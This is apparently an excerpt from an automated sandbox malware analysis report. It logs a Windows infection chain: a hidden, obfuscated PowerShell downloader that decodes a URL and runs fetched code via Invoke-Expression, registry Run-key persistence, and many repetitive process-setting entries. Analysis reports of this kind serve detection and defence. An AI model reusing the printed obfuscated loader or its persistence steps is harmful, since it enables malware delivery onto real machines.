                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Sweetshop Forprogrammere Bevidstlse #>;$Billetkontoret='hovedngles';<#hygroscopically Borgerliggr Torpets Unclassified Blokvognens #>;$Psykes=$sulfate+$host.UI;function Boendes($Motorisere){If ($Psykes) {$Unpictorialised++;}$Aarskiftet=$genindkaldte+$Motorisere.'Length'-$Unpictorialised; for( $Herregaardene131=4;$Herregaardene131 -lt $Aarskiftet;$Herregaardene131+=5){$Pyramidia++;$Foredevote+=$Motorisere[$Herregaardene131];$Riskfulness='Oprejses';}$Foredevote;}function Aromastofs($Oversigtsbilleders173){ & ($Fandangoer) ($Oversigtsbilleders173);}$Kolonialvares=Boendes 'LaggMHjelo D lz dreiUnsilMat lTa fa F e/Forb ';$Kolonialvares+=Boendes 'S ks5Bran. Pr 0Bede Topi(Fl bWK.ldiMadenbeard,uako TomwMarrsVis JerkN UdaT kov oss1Agra0T nn.besk0bio ;Feri .aphWNobbiRumln Feu6Pick4Ansv;Nord Hen xBirk6 Afs4sk d;,oss OffrKrydvDomm:Spr 1Sm g3Uud,1A ti. lmu0Calo) Si Man G askeHjercde.ak ssioUdsm/ Rot2Depo0Verb1Erot0Elec0Spar1,iks0 Kun1Jord PreFYeariRe orShreeS orfOct,oFarax Ri /Supe1Mail3Lap 1Pyxi.Sawn0Tyre ';$Sparebsserne=Boendes ' CoeuR mmSMatlE Br rVo,d-U,faaKon.gBrn.EForsnDolkt kva ';$Cafuso=Boendes 'Cho,hPytot,uttt A dp V,tsSmle:mode/ C,u/St ecLamiaSc irfraneSesue yhrGodsfHjemi KunnDecrdlivre OutrSnek. IderOrbio .av/Mngdv pndn Ko,/Juk T Pr rT,keaW,stuNsker,ackiRes.gDis hSpaaeBem.d PoleCalfr Bas.ProcsHeineTranaAmin ';$Luncher=Boendes 'R ck>Vi,t ';$Fandangoer=Boendes 'HanhIunrueBoniXTemp ';$Ensnarement='Unlabialise167';$Totalisatorers='\Knighting.Pro';Aromastofs (Boendes ' Alg$E phgTinkLBadkOBrugBLayoaIndblBrne:Pr dT BatRBa keIspim N,nmSkumePrigspseutUd ao udfL,rouECu tnpas,ehals=Pala$Decie BebnLaarVCart:Rou,aChilp ampDri.DSikkaF.intAdm.AAn.i+Scud$,atat,wkwoRekttGaleAHardLBasiI Li S .tyAEquiTStosO.chorafstEVoveRSlidSOver ');Aromastofs (Boendes 'Venc$ XylgSlicLCo doVietb Pr.ADe sLPrst:UndepLordo Mi tJordASke sDynasVak.iElemFSheeEBrutRTr noSkitUAlcaS Kon=Folk$ entcTrapaSammfDy eUGuatsRovso ksp.Hu vsInseP ImplCollIRacetJ,ds(Dsl,$ Ug.l Z ru.ypeNFortc RgthN veESbeoRMed ) Soc ');Aromastofs (Boendes ' For[EmbenIsbjEtr ntrun .G nesFredEKaffRFir VLilliWaffc uefEHl np Lono l einasiNNonptKeycmExteA ByonFedeAMi rg ReiESu erkamp]Dis :Infe: ForsTrykEE,orCUnimu S irNontIKluntAtr yFejlpForor FroOAktutplotOH veC ilkOLoupLNonc Svk=Acep Lae[SturNDrage Va TT.le. Sk SMu feSlvecShr uSeleR bevI DdktTriryInwep TchrOverO ooptAizoo usCTargO,ettLLiteTNonpYArbepTyvee O,e]Tros:Tank:.enetKneblsomeS rti1dict2Well ');$Cafuso=$Potassiferous[0];$Kvatorialguineaner=(Boendes 'st.k$Vin GVrngl.toloMo,ebOv yA VoyLCoun:HestU.altn MaiE Ru vPi ta TouNBroke ouis u.gCYanaEStr,NAquaTRedrL NotYMel.=konsn ampeN tuwGuls- A.kOCivibAkkrjConfE Pa c U.dTCcdc SnkeSKekcYUrimsBalatAfdaEFlaaM Ach. osn preE Drat Sk .Wardw ExcEGangBAllecCro lfrisIInteeAnmen UndTmaan ');Aromastofs ($Kvatorialguineaner);Aromastofs (Boendes 'Fors$ RebU SpanAcineamfev MinaTeernRegieJulos onecpheneDecln ButtoverlTilsyUnh.. dsJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,13_2_004044A4
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848E8CFE8 push esp; retf 2_2_00007FF848E8CFE9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F57FE0 push eax; retf 2_2_00007FF848F57FE1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_09971796 pushad ; retf 5_2_09971797
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_099715BB push cs; ret 5_2_099715BE
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_09971FD1 push ecx; iretd 5_2_09971FE7
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_234C1219 push esp; iretd 8_2_234C121A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_234B2806 push ecx; ret 8_2_234B2819
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_04531FD1 push ecx; iretd 8_2_04531FE7
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_04531796 pushad ; retf 8_2_04531797
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_045315BB push cs; ret 8_2_045315BE
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044693D push ecx; ret 13_2_0044694D
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044DB70 push eax; ret 13_2_0044DB84
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0044DB70 push eax; ret 13_2_0044DBAC
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00451D54 push eax; ret 13_2_00451D61
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0044B090 push eax; ret 14_2_0044B0A4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0044B090 push eax; ret 14_2_0044B0CC
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00451D34 push eax; ret 14_2_00451D41
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00444E71 push ecx; ret 14_2_00444E81
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00414060 push eax; ret 16_2_00414074
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00414060 push eax; ret 16_2_0041409C
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00414039 push ecx; ret 16_2_00414049
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_004164EB push 0000006Ah; retf 16_2_004165C4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00416553 push 0000006Ah; retf 16_2_004165C4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00416555 push 0000006Ah; retf 16_2_004165C4
                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run humplersJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run humplersJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,14_2_004047CB
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
